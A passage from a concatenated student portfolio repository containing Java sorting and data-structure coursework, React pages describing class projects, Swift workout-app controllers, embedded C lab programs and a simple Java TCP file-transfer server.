/**
* Write points[] to a string. When printed, the points will appear in order
* of increasing index with every point occupying a separate line. The x and
* y coordinates of the point are displayed on the same line with exactly
* one blank space in between.
*/
@Override
public String toString() {
String s = "";
for(int i = 0; i < points.length; i++){
s = s + points[i].getX() + " " + points[i].getY() + "\n";
}
return s;
}
/**
*
* This method, called after sorting, writes point data into a file by
* outputFileName. It will be used for Mathematica plotting to verify the
* sorting result. The data format depends on sortByAngle. It is detailed in
* Section 4.1 of the assignment description assn2.pdf.
*
* @throws FileNotFoundException
*/
public void writePointsToFile() throws FileNotFoundException {
if(sortByAngle == false){
File outFile = new File(outputFileName);
PrintWriter out = new PrintWriter(outFile);
for(int i = 0; i < points.length; i++){
String s = "" + points[i].getX() + " " + points[i].getY();
out.write(s);
out.write("\r\n");
}
out.close();
}
if(sortByAngle == true){
File outFile = new File(outputFileName);
PrintWriter out = new PrintWriter(outFile);
for(int i = 0; i < points.length; i++){
if(i == 0){
String s = "" + points[i].getX() + " " + points[i].getY();
out.write(s);
out.write("\r\n");
}
else{
String s = "" + points[i - 1].getX() + " " + points[i - 1].getY() + " " + points[0].getX() + " " + points[0].getY() + " " + points[i - 1].getX() + " " + points[i - 1].getY();
out.write(s);
out.write("\r\n");
}
}
out.close();
}
}
/**
* Generates a comparator on the fly that compares by polar angle if
* sortByAngle == true and by x-coordinate if sortByAngle == false. Set the
* protected variable pointComparator to it. Need to create an object of the
* PolarAngleComparator class and call the compareTo() method in the Point
* class, respectively for the two possible values of sortByAngle.
*
* @param order
*/
protected void setComparator() {
if(sortByAngle == false){
pointComparator = new Comparator<Point>(){
@Override
public int compare(Point p2, Point p1) {
Point p = new Point(p1.getX(), p1.getY());
return -p.compareTo(p2);
}
};
}
else if(sortByAngle == true){
PolarAngleComparator p = new PolarAngleComparator(lowestPoint);
pointComparator = p;
}
}
/**
* Swap the two elements indexed at i and j respectively in the array
* points[].
*
* @param i
* @param j
*/
protected void swap(int i, int j) {
Point t = points[i];
points[i] = points[j];
points[j] = t;
}
}
<file_sep>/src/Components/ReactPortfolio/ReactPortfolio.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
const Title = Typography.Title;
export default class ReactPortfolio extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>This Portfolio - React.JS</Title>
<Title level={4}>Technologies: React.JS, Google Cloud Platform, Node.JS Server</Title>
Over the summer of 2020, I had the opportunity to work with Buildertrend on converting
their webapp from using Webforms to React.JS. After using React, I found it very fascinating
and I wanted to do more with it. For my previous portfolio, <a href="https://portfolio-258522.appspot.com" target="_blank" rel="noopener noreferrer">here</a>, I used html pages and
Java Springboot for the backend. React is a much more modern way of making a webapp which is
why I wanted to use it. Click the link below to view the code for this portfolio on my github
page.
<br></br>
<a href="https://github.com/balex654/Portfolio" target="_blank" rel="noopener noreferrer">View this portfolio on github</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/FirstPortfolio/FirstPortfolio.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import controller from './controller.png';
import SpringbootSS1 from './SpringbootSS1.png';
import SpringbootSS2 from './SpringbootSS2.png';
import SpringbootSS3 from './SpringbootSS3.png';
const Title = Typography.Title;
export default class FirstPortfolio extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>First Portfolio - Google Cloud Platform</Title>
<Title level={4}>Technology: Google Cloud Platform, Java, HTML</Title>
Before making this portfolio, a thought came to me saying that I needed a better way to
showcase my work and my experience. All of my peers have a LinkedIn and resume but
very few college engineers have a portfolio that details their work. So I decided to make
one on the Google Cloud Platform. I developed the project in Java Springboot and used HTML
pages to add all the content. I used HTML and Java Springboot because this was before I knew how
to use ReactJS which is what my current porfolio (this website) is made with.
</Col>
</Row>
<Row>
<Col span={24}>
<Title level={4}>freshman.jsp</Title>
<img width='100%' src={SpringbootSS1} alt=''/>
<Title level={4}>coms228.jsp</Title>
<img width='100%' src={SpringbootSS2} alt=''/>
<Title level={4}>hw3.jsp</Title>
<img width='100%' src={SpringbootSS3} alt=''/>
<Title level={4}>HomeController.java</Title>
<img width='100%' src={controller} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project3/Project3.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import AdaptiveList from './AdaptiveList.java';
import AdaptiveListSS1 from './AdaptiveListSS1.png';
import AdaptiveListSS2 from './AdaptiveListSS2.png';
import AdaptiveListSS3 from './AdaptiveListSS3.png';
import AdaptiveListSS4 from './AdaptiveListSS4.png';
import AdaptiveListSS5 from './AdaptiveListSS5.png';
import AdaptiveListSS6 from './AdaptiveListSS6.png';
import ProjectFiles from './hw3.zip';
import output from './output.png';
import testJava from './test.java';
import testPNG from './test.png';
const Title = Typography.Title;
export default class Project3 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Created Adaptive List Object - Project 3</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
For this project, I created a linked-list data structure in Java, similar to an ArrayList.
The list worked by creating a node object for every item and linking the nodes together with
the fields in the node objects. The list is generic so it can be used with any type of object
in Java. Also, it has many built-in function such as clear(), add(), and contains().
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>test.java (click on image to download file)</Title>
<a href={testJava} download="test.java">
<img width='100%' src={testPNG} alt=''/>
</a>
<Title level={4}>Output of test.java</Title>
<img width='100%' src={output} alt=''/>
<Title level={4}>AdaptiveList.java (click on image to download file)</Title>
<a href={AdaptiveList} download="AdaptiveList.java">
<img width='100%' src={AdaptiveListSS1} alt=''/>
<img width='100%' src={AdaptiveListSS2} alt=''/>
<img width='100%' src={AdaptiveListSS3} alt=''/>
<img width='100%' src={AdaptiveListSS4} alt=''/>
<img width='100%' src={AdaptiveListSS5} alt=''/>
<img width='100%' src={AdaptiveListSS6} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutApp/WorkoutViewController.swift
//
// WorkoutViewController.swift
// workoutApp
//
// Created by <NAME> on 1/20/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class WorkoutViewController: UIViewController, UITableViewDelegate, UITableViewDataSource {
@IBOutlet weak var workoutTableView: UITableView!
private var workout: Workout = Variables.workouts[Variables.clickedOn]
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view.
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return Variables.workouts[Variables.clickedOn].showExercises().count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
//let cell = UITableViewCell(style: UITableViewCell.CellStyle.default, reuseIdentifier: "cell")
let cell = tableView.dequeueReusableCell(withIdentifier: "cell", for: indexPath) as? WorkoutTableViewCell
cell!.exerciseName.text = Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showName()
let reps = "Reps: "
let weight = "Weight: "
cell!.reps1.text = reps + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showReps()[0])
cell!.reps2.text = reps + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showReps()[1])
cell!.reps3.text = reps + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showReps()[2])
cell!.reps4.text = reps + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showReps()[3])
cell!.weight1.text = weight + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showWeight()[0])
cell!.weight2.text = weight + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showWeight()[1])
cell!.weight3.text = weight + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showWeight()[2])
cell!.weight4.text = weight + String(Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row].showWeight()[3])
return cell!
}
/*
// MARK: - Navigation
// In a storyboard-based application, you will often want to do a little preparation before navigation
override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
// Get the new view controller using segue.destination.
// Pass the selected object to the new view controller.
}
*/
}
<file_sep>/src/ClassComponents/ComS228/Project2/MergeSorter.java
package edu.iastate.cs228.hw2;
import java.io.FileNotFoundException;
import java.util.InputMismatchException;
/**
*
* @author <NAME>
*
*/
/**
*
* This class implements the mergesort algorithm.
*
*/
public class MergeSorter extends AbstractSorter {
private Point[] array;
private Point[] tempMergArr;
private int length;
/**
* The two constructors below invoke their corresponding superclass
* constructors. They also set the instance variables algorithm and
* outputFileName in the superclass.
*/
/**
* Constructor accepts an input array of points. in the array.
*
* @param pts
* input array of integers
*/
public MergeSorter(Point[] pts) {
super(pts);
outputFileName = "merge.txt";
algorithm = "merge sorter ";
}
/**
* Constructor reads points from a file.
*
* @param inputFileName
* name of the input file
* @throws FileNotFoundException
* @throws InputMismatchException
*/
public MergeSorter(String inputFileName) throws InputMismatchException, FileNotFoundException {
super(inputFileName);
outputFileName = "merge.txt";
algorithm = "merge sorter ";
}
/**
* Perform mergesort on the array points[] of the parent class
* AbstractSorter.
*
* @param order
* 1 by x-coordinate 2 by polar angle
*
*/
@Override
public void sort(int order) {
if (order < 1 || order > 2) {
throw new IllegalArgumentException("Invalid input");
}
else{
if (order == 1) {
sortByAngle = false;
} else {
sortByAngle = true;
}
setComparator();
long startTime = System.nanoTime();
mergeSortRec(points);
long endTime = System.nanoTime();
sortingTime = endTime - startTime;
try {
writePointsToFile();
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
/**
* This is a recursive method that carries out mergesort on an array pts[]
* of points. One way is to make copies of the two halves of pts[],
* recursively call mergeSort on them, and merge the two sorted subarrays
* into pts[].
*
* @param pts
* point array
*/
private void mergeSortRec(Point[] pts) {
array = pts;
length = pts.length;
tempMergArr = new Point[length];
merge(0, length - 1);
}
/**
* Recursive helper method for mergeSortRec
*
* @param lowIndex
* @param highIndex
*/
private void merge(int lowIndex, int highIndex) {
if (lowIndex < highIndex) {
int middle = lowIndex + (highIndex - lowIndex) / 2;
merge(lowIndex, middle);
merge(middle + 1, highIndex);
mergeParts(lowIndex, middle, highIndex);
}
}
/**
* Helper method to the recursive method merge.
* This method's main purpose is to compare the given points
* of the partial array
*
* @param lowIndex
* @param middleIndex
* @param highIndex
*/
private void mergeParts(int lowIndex, int middleIndex, int highIndex) {
for (int i = lowIndex; i <= highIndex; i++){
tempMergArr[i] = array[i];
}
int i = lowIndex;
int j = middleIndex + 1;
int k = lowIndex;
while (i <= middleIndex && j <= highIndex) {
if (pointComparator.compare(tempMergArr[i], tempMergArr[j]) == -1){
array[k] = tempMergArr[i];
i++;
}
else{
array[k] = tempMergArr[j];
j++;
}
k++;
}
while (i <= middleIndex){
array[k] = tempMergArr[i];
k++;
i++;
}
}
}
<file_sep>/src/ClassComponents/ComS311/Project1/Project1.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import project1Q1 from './project1Q1.png'
import project1Q2 from './project1Q2.png'
import project1Q3ss1 from './project1Q3ss1.png'
import project1Q3ss2 from './project1Q3ss2.png'
import project1Q4ss1 from './project1Q4ss1.png'
import project1Q4ss2 from './project1Q4ss2.png'
import q1 from './q1.py';
import q3 from './q3.py';
import q4 from './q4.py';
import q5 from './q5.py';
const Title = Typography.Title;
export default class Project1 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Graph Traversal Algorithms (Shortest path algorithms) - Project 1</Title>
<Title level={4}>Technology: Python, Visual Studio Code</Title>
<Title level={2}>Graph Representation</Title>
The strings at the bottom of the file represent the graph with the first character of the
first line indicating whether the graph is directed (D) or undirected (U). The second character
on the first line indicated how many nodes are in the graph. The rest of the lines indicate the edges,
with the first number being the starting node and the second character being the ending node.
<Title level={2}>Question 1</Title>
For this, I implemented a breadth first search algorithm on a directed graph with the analogy of using wall outlet adapters. The scenario
for the problem is that you are in a different country that uses a different type of wall outlet and you
have a certain amount of different adapters with you that convert your charger's type to the wall outlet type.
The algorithm outputs the least amount of adapters that you have to link together in order to convert your
charger to the wall outlet.
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>q1.py (click on image to download code)</Title>
<a href={q1} download="q1.py">
<img width='100%' src={project1Q1} alt=''/>
</a>
<Title level={2}>Question 2</Title>
This algorithm performs a topological sort on a directed graph.
<Title level={4}>q2.py (click on image to download code)</Title>
<a href={q3} download="q2.py">
<img width='100%' src={project1Q2} alt=''/>
</a>
<Title level={2}>Question 3</Title>
The scenario for this question is you are at a building on a college campus and you need to get
to another building via walkways taking the route with the least distance. The scenario uses an undirected
graph with the nodes being the buildings and the edges being the walkways. The graph representation is
the same as the directed graph's but there is a third number in each edge description which represents
the weight of the edge (walkway distance). The 'W' in the first line of the description indicates that
the graph is weighted. The algorithm finds the shortest path using Prim's algorithm.
<Title level={4}>q3.py (click on image to download code)</Title>
<a href={q4} download="q3.py">
<img width='100%' src={project1Q3ss1} alt=''/>
<img width='100%' src={project1Q3ss2} alt=''/>
</a>
<Title level={2}>Question 4</Title>
This question uses Dijkstra's algorithm on an undirected weighted graph which is represented the
same way as the previous question. The algorithm find the shortest distances from a starting node
to every other node in the graph and returns the maximum of these distances.
<Title level={4}>q4.py (click on image to download code)</Title>
<a href={q5} download="q4.py">
<img width='100%' src={project1Q4ss1} alt=''/>
<img width='100%' src={project1Q4ss2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A4/SquareMap.java
package hw4;
import java.awt.Point;
import java.awt.Polygon;
import java.util.ArrayList;
import graph.Cell;
import graph.GraphMap;
/**
* A square lattice where each cell has 4 neighbors set up in a checker board pattern.
* @author <NAME>
*
*/
public class SquareMap extends GraphMap{
/**
* Makes a new SquareMap with the GraphMap constructor
*/
public SquareMap(){
super();
}
/**
* Gets the width of the window in pixels for rendering, including the border area.
* @return the width of the pixels
*/
public int getPixelWidth(){
int width;
Cell[][] cell = getCells();
width = (getDistance() * cell[0].length) + getDistance();
return width;
}
/**
* Gets the height of the window in pixels for rendering, including the border area.
* @return the height in pixels
*/
public int getPixelHeight(){
int height;
Cell[][] cell = getCells();
height = (getDistance() * cell.length) + getDistance();
return height;
}
/**
* Create an array of neighbors for the cell with given column and row.
* @param col - The column index of a Cell
* row - The row index of a Cell
* @return An array containing adjacent cells
*/
public Cell[] createNeighbors(int col, int row){
Cell[][] map = getCells();
ArrayList<Cell> neighbors = new ArrayList<Cell>();
if((row - 1) >= 0){
neighbors.add(map[row - 1][col]);
}
if((col - 1) >= 0){
neighbors.add(map[row][col - 1]);
}
if((row + 1) <= map.length - 1){
neighbors.add(map[row + 1][col]);
}
if((col + 1) <= map[0].length - 1){
neighbors.add(map[row][col + 1]);
}
Cell[] c = new Cell[neighbors.size()];
for(int i = 0; i < neighbors.size(); i++){
c[i] = neighbors.get(i);
}
return c;
}
/**
* Get the column and row indices for the cell closest to a given pixel (x, y)
* coordinate, returned as a Point object in which x is the column and y is the row.
* @param x - The x coordinate in pixels
* y - The y coordinate in pixels
* @return column and row indices for the cell closest to the given (x, y)
*/
protected java.awt.Point selectClosestIndex(int x, int y){
int xdist = (x - (getDistance() / 2)) / getDistance();
int ydist = (y - (getDistance() / 2)) / getDistance();
return new Point(xdist, ydist);
}
/**
* Create a polygon for the cell with the given column and row.
* @param col - The column index of a Cell
* row - The row index of a Cell
* @return A polygon with correct pixel coordinates for rendering the cell
*/
public java.awt.Polygon createPolygon(int col, int row){
int[] xpoints = new int[4];
int[] ypoints = new int[4];
xpoints[0] = (col * getDistance()) + (getDistance() / 2);
xpoints[1] = (col * getDistance()) + getDistance() + (getDistance() / 2);
xpoints[2] = xpoints[1];
xpoints[3] = xpoints[0];
ypoints[0] = (row * getDistance()) + (getDistance() / 2);
ypoints[1] = ypoints[0];
ypoints[2] = (row * getDistance()) + getDistance() + (getDistance() / 2);
ypoints[3] = ypoints[2];
return new Polygon(xpoints, ypoints, 4);
}
}
<file_sep>/src/ClassComponents/ComS228/Project1/Sequence.java
package edu.iastate.cs228.hw1;
/*
* @author <NAME>
*/
public class Sequence {
/**
* holds the character array for the DNA sequence
*/
public char[] seqarr; // made public instead of protected for grading.
/**
* Creates a sequence object and uses the isValidLetter() method to check
* if every char- acter in the array sarr is valid. If so, it makes and keeps
* a copy of the array sarr in the field seqarr of type char[]. Otherwise,
* it throws an IllegalArgumentException.
* @param sarr
*/
public Sequence(char[] sarr) {
for (int i = 0; i < sarr.length; i++) {
if (isValidLetter(sarr[i]) == false) {
throw new IllegalArgumentException("Invalid sequence letter for class " + this.getClass());
}
}
seqarr = sarr.clone();
}
/**
* The method returns the length of the character array seqarr.
* @return Sequence length
*/
public int seqLength() {
return seqarr.length;
}
/**
* The method makes and returns a copy of the char array seqarr.
* @return a copy of the sequence
*/
public char[] getSeq() {
return seqarr.clone();
}
/**
* The method returns the string representation of the char array seqarr.
* @return the sequence in string form
*/
public String toString() {
String sequence = "";
for (int i = 0; i < seqarr.length; i++) {
sequence = sequence + seqarr[i];
}
return sequence;
}
/**
* The method returns true if the argument obj is not null and is
* of the same type as this object in a case insensitive mode.
* @param an object of any type
* @return true if obj is equal to this (case insensitive), false otherwise
*/
public boolean equals(Object obj) {
if(obj instanceof char[] && obj != null){
char[] copy = (char[]) obj;
char[] copy2 = seqarr;
for (int i = 0; i < copy.length; i++) {
if (copy[i] == 'A') {
copy[i] = 'a';
}
if (copy[i] == 'C') {
copy[i] = 'c';
}
if (copy[i] == 'G') {
copy[i] = 'g';
}
if (copy[i] == 'T') {
copy[i] = 't';
}
}
for (int i = 0; i < copy2.length; i++) {
if (copy2[i] == 'A') {
copy2[i] = 'a';
}
if (copy2[i] == 'C') {
copy2[i] = 'c';
}
if (copy2[i] == 'G') {
copy2[i] = 'g';
}
if (copy2[i] == 'T') {
copy2[i] = 't';
}
}
if(copy.length != copy2.length){
return false;
}
for(int i = 0; i < copy.length; i++){
if(copy[i] != copy2[i]){
return false;
}
}
return true;
}
else{
return false;
}
}
/**
* The method returns true if the character let is an uppercase or lowercase
* it returns false otherwise
* @param let
* @return true if let is valid, false otherwise
*/
public boolean isValidLetter(char let) {
if (Character.isUpperCase(let) || Character.isLowerCase(let)) {
return true;
}
else {
return false;
}
}
}
<file_sep>/src/ClassComponents/CPRE185/Lab8/lab8.c
#include <stdio.h>
#define MAXPOINTS 10000
// compute the average of the first num_items of buffer
double avg(double buffer[], int num_items);
//update the max and min of the first num_items of array
void maxmin(double array[], int num_items, double* max, double* min);
//shift length-1 elements of the buffer to the left and put the
//new_item on the right.
void updatebuffer(double buffer[], int length, double new_item);
double avg(double buffer[], int num_items){
int i;
double sum = 0;
double average;
for (i = 0; i < num_items; ++i){
sum = buffer[i] + sum;
}
average = sum / num_items;
return average;
}
void maxmin(double array[], int num_items, double* max, double* min){
int i;
for (i = 0; i < num_items; ++i){
if (array[i] > *max){
*max = array[i];
}
if (i == 0 ){
*max = array[i];
}
if (array[i] < *min){
*min = array[i];
}
if (i == 0){
*min = array[i];
}
}
return;
}
void updatebuffer(double buffer[], int length, double new_item){
int i;
for (i = 0; i <= length; ++i){
if (i == length){
buffer[i - 1] = new_item;
}
else{
buffer[i] = buffer[i + 1];
}
}
return;
}
int main(int argc, char* argv[]) {
int bB, bT, bL, bR, bC;
double bP;
double ax, ay, az;
double x[MAXPOINTS], y[MAXPOINTS], z[MAXPOINTS];
int lengthofavg = 0;
int i;
double avgX, avgY, avgZ;
double maxX = 0;
double minX = 0;
double maxY = 0;
double minY = 0;
double maxZ = 0;
double minZ = 0;
double newX, newY, newZ;
if (argc>1) {
sscanf(argv[1], "%d", &lengthofavg );
printf("You entered a buffer length of %d\n", lengthofavg);
}
else {
printf("Enter a length on the command line\n");
return -1;
}
if (lengthofavg <1 || lengthofavg >MAXPOINTS) {
printf("Invalid length\n");
return -1;
}
for(i = 0; i < lengthofavg; ++i){
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &x[i], &y[i], &z[i], &bB, &bT, &bL, &bR, &bC, &bP);
}
while(1){
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &ax, &ay, &az, &bB, &bT, &bL, &bR, &bC, &bP);
printf("%lf, %lf, %lf, ", ax, ay, az);
maxmin(x, lengthofavg, &maxX, &minX);
maxmin(y, lengthofavg, &maxY, &minY);
maxmin(z, lengthofavg, &maxZ, &minZ);
printf("%lf, %lf, %lf, %lf, %lf, %lf, ", maxX, minX, maxY, minY, maxZ, minZ);
avgX = avg(x, lengthofavg);
avgY = avg(y, lengthofavg);
avgZ = avg(z, lengthofavg);
printf("%lf, %lf, %lf\n", avgX, avgY, avgZ);
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &newX, &newY, &newZ, &bB, &bT, &bL, &bR, &bC, &bP);
updatebuffer(x, lengthofavg, newX);
updatebuffer(y, lengthofavg, newY);
updatebuffer(z, lengthofavg, newZ);
if (bL == 1){
return 0;
}
}
}
<file_sep>/src/ClassComponents/CPRE288/Lab6/Lab6.c
/* Lab 6
<NAME>
<NAME>
<NAME>
2/28/2018
Made for cybot #4
*/
#include <stdlib.h>
#include "Timer.h"
#include "lcd.h"
#include <math.h>
void PortB_Init (void){
SYSCTL_RCGCADC_R |= 0x1; //Enable ADC Clock
SYSCTL_RCGCGPIO_R |= 0x2; //Enable GPIO port B clock
GPIO_PORTB_AFSEL_R |= 0x10; //Sets PB4 to alternate function
GPIO_PORTB_DEN_R &= 0xEF; //Disables PB4's digital functions
GPIO_PORTB_AMSEL_R |= 0x10; //Disable analog isolation on PB4
}
void ADC_init (void){
ADC0_ACTSS_R &= 0xFFFFFFF0; //Disable Sample Sequencers for configuration
ADC0_SSMUX0_R = 0x0000000A; //Select AIN10(PB4) as input for ADC0 sample sequencer 4
ADC0_SSCTL0_R = 0x00000006; //Configures SS0 to take one sample and place into fifo
ADC0_EMUX_R &= 0xFFFF0000; //Configure all of the SS to trigger on change in PSSI input
ADC0_SAC_R |= 0x4; //Configure ADC hardware averager to take 16 samples
ADC0_ACTSS_R |= 0x1; //Enable SS0
}
float CentimeterConv (int ADCValue) {
return 59789*pow(ADCValue, -1.086); //Uses tabulated formula to compute distance
}
int main (void){
int AdcResult = 0; //Variable to hold raw output from the ADC
float Distance = 0; //Varialbe to hold distance in CM
PortB_Init(); //Initialize port B
ADC_init(); //Initialize ADC
lcd_init(); //Initialize LCD
while(1){
if (!(ADC0_ACTSS_R & 0x00010000)) { //If the ADC is not busy start conversion
ADC0_PSSI_R |= 0x1;
}
if (ADC0_RIS_R & 0x00000001){ //If conversion is complete Store result
AdcResult = ADC0_SSFIFO0_R;
ADC0_ISC_R |= 0x1;
}
Distance = CentimeterConv(AdcResult); //Calculate actual distance
lcd_printf("%d, \n %0.1f cm", AdcResult, Distance); //Display Results
timer_waitMillis(250);
}
}
<file_sep>/src/ClassComponents/CPRE381/CPRE381.js
import React from 'react';
import { Layout, Menu, Breadcrumb } from 'antd';
import { MenuOutlined, HomeOutlined } from '@ant-design/icons';
import '../../Components/HomePage/HomePage.css';
import { Redirect } from 'react-router-dom';
import ProjectA from './ProjectA/ProjectA.js';
import ProjectB from './ProjectB/ProjectB.js';
const { Header, Content, Sider } = Layout;
export default class CPRE381 extends React.Component {
state = {
collapsed: false,
currentPage: "ProjectA"
}
onCollapse = collapsed => {
this.setState({ collapsed });
};
handleHomeClick = () => {
this.setState({
currentPage: "Home"
});
}
handleProjectAClick = () => {
this.setState({
currentPage: "ProjectA"
});
}
handleProjectBClick = () => {
this.setState({
currentPage: "ProjectB"
});
}
render() {
let page;
let width;
let pathItem1 = "default";
let pathItem2 = "default";
if (this.state.currentPage === "Home") {
return <Redirect to={"/Home"}/>
}
else if (this.state.currentPage === "ProjectA") {
page = <ProjectA/>
}
else if (this.state.currentPage === "ProjectB") {
page = <ProjectB/>
}
if (this.props.location.state.path === "Categories/LowLevel") {
pathItem1 = "Categories"
pathItem2 = "Low Level"
}
else if (this.props.location.state.path === "Years/Junior") {
pathItem1 = "Years"
pathItem2 = "Junior"
}
if (this.state.collapsed === true) {
width = 80;
}
else {
width = 400;
}
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsible
collapsed={this.state.collapsed}
onCollapse={this.onCollapse}
breakpoint="xl"
width="400"
style={{
overflow: 'auto',
position: 'fixed',
height: '100vh',
left: 0,
}}
>
{this.state.collapsed===true ?
<div className="logo-collapsed">
BA
</div>
:
<div className="logo-expanded">
<NAME>
</div>
}
<Menu theme="dark" defaultSelectKeys={['1']} mode="inline">
<Menu.Item key="7" icon={<HomeOutlined/>} onClick={this.handleHomeClick}>
Home
</Menu.Item>
<Menu.Divider/>
<Menu.Item key="1" icon={<MenuOutlined/>} onClick={this.handleProjectAClick}>
Single-Cycle MIPS Processor - Project A
</Menu.Item>
<Menu.Item key="2" icon={<MenuOutlined/>} onClick={this.handleProjectBClick}>
32-bit MIPS Pipline Processor - Project B
</Menu.Item>
</Menu>
</Sider>
<Layout className="site-layout" style={{marginLeft:width}}>
<Header className="site-layout-background" style={{ padding: 0 }}/>
<Content style={{ margin: '0 16px' }}>
{this.state.currentPage === "ProjectA" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Computer Architecture - CPRE 381</Breadcrumb.Item>
<Breadcrumb.Item>Single-Cycle MIPS Processor - Project A</Breadcrumb.Item>
</Breadcrumb>
}
{this.state.currentPage === "ProjectB" &&
<Breadcrumb style={{ margin: '16px 0' }}>
<Breadcrumb.Item>{pathItem1}</Breadcrumb.Item>
<Breadcrumb.Item>{pathItem2}</Breadcrumb.Item>
<Breadcrumb.Item>Computer Architecture - CPRE 381</Breadcrumb.Item>
<Breadcrumb.Item>32-bit MIPS Pipline Processor - Project B</Breadcrumb.Item>
</Breadcrumb>
}
<div className="site-layout-background" style={{ padding: 24, minHeight: 360 }}>
{page}
</div>
</Content>
</Layout>
</Layout>
);
}
}<file_sep>/src/Components/CPRE186/TCPServer.java
import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.Scanner;
import java.awt.Desktop;
public class TCPServer {
public static void main(String[] args) throws Exception {
String fileName = "";
String fileLength = "";
ServerSocket welcomeSocket = new ServerSocket(15001);
while (true) {
Socket connectionSocket = welcomeSocket.accept();
BufferedReader inFromClient = new BufferedReader(new InputStreamReader(connectionSocket.getInputStream()));
DataInputStream binaryInFromClient = new DataInputStream(new BufferedInputStream(connectionSocket.getInputStream()));
DataOutputStream outToClient = new DataOutputStream(connectionSocket.getOutputStream());
try {
fileName = inFromClient.readLine();
System.out.println("Recieved: " + fileName);
outToClient.writeBytes(fileName+"\n");
fileLength = inFromClient.readLine();
System.out.println("Length: " + fileLength);
outToClient.writeBytes(fileLength+"\n");
Scanner lengthInput = new Scanner(fileLength);
int length = lengthInput.nextInt();
lengthInput.close();
File file = new File("/Users/benalexander/School/ComS227/cpre186"+fileName);
DataOutputStream fileOutput = new DataOutputStream(new FileOutputStream(file));
byte[] cbuf = new byte[length];
int bytesRead = 0;
long percent = 0;
while (bytesRead < length) {
int bytesRecieved = binaryInFromClient.read(cbuf, bytesRead, length-bytesRead);
if (bytesRecieved > 0) {
bytesRead += bytesRecieved;
percent = 100L*bytesRead/length;
System.out.print("\r Percent Recieved: " + percent + "%");
} else
throw new java.lang.NullPointerException();
}
System.out.println("");
fileOutput.write(cbuf, 0, length);
fileOutput.close();
} catch (java.lang.NullPointerException e) {
System.out.println("Client intitiated disconnect.");
fileName = "";
}
try {
connectionSocket.close();
} finally {
System.out.println("Connection socket closed");
}
/**
try{
//Process process = new ProcessBuilder("C:/Program Files (x86)/Windows Media Player/T-shirt.mp3").start();
//Desktop.getDesktop().open(new File("C:/users/jkc11/onedrive/documents/cpre186/server/"+fileName));
Thread t = new Thread(new Playmusic(fileName));
t.start();
} catch(Exception e){
e.printStackTrace();
}*/
}
}
}
<file_sep>/src/Components/WorkoutTracker/ExerciseViewController.swift
//
// ExerciseViewController.swift
// WorkoutTracker
//
// Created by <NAME> on 1/11/20.
// Copyright © 2020 <NAME>. All rights reserved.
//
import UIKit
class ExerciseViewController: UIViewController {
@IBOutlet weak var exerciseName: UITextField!
@IBOutlet weak var workoutName: UITextField!
@IBOutlet weak var reps: UITextField!
@IBOutlet weak var weight: UITextField!
var setOrderNum: Int = 0
var exerciseNum: Int = 0
var wID: String = ""
var sets: [ExerciseSet] = [] as! [ExerciseSet]
var exercises: [Exercise] = [] as! [Exercise]
override func viewDidLoad() {
super.viewDidLoad()
}
@IBAction func enterSet(_ sender: Any) {
setOrderNum += 1
let set = ExerciseSet(reps: reps.text!, weight: weight.text!, orderNum: setOrderNum, exerciseID: -1, exerciseOrder: exerciseNum)
sets.append(set)
reps.text = ""
weight.text = ""
}
@IBAction func nextExercise(_ sender: Any) {
exerciseNum += 1
setOrderNum = 0
let exercise = Exercise(name: exerciseName.text!, eID: -1)
exercises.append(exercise)
exerciseName.text = ""
}
@IBAction func endWorkout(_ sender: Any) {
let formatter : DateFormatter = DateFormatter()
formatter.dateFormat = "yyyy/M/d"
let date : String = formatter.string(from: NSDate.init(timeIntervalSinceNow: 0) as Date)
let calDate = Date()
let calendar = Calendar.current
let hour = calendar.component(.hour, from: calDate)
let minute = calendar.component(.minute, from: calDate)
let second = calendar.component(.second, from: calDate)
let time = "\(hour):\(minute):\(second)"
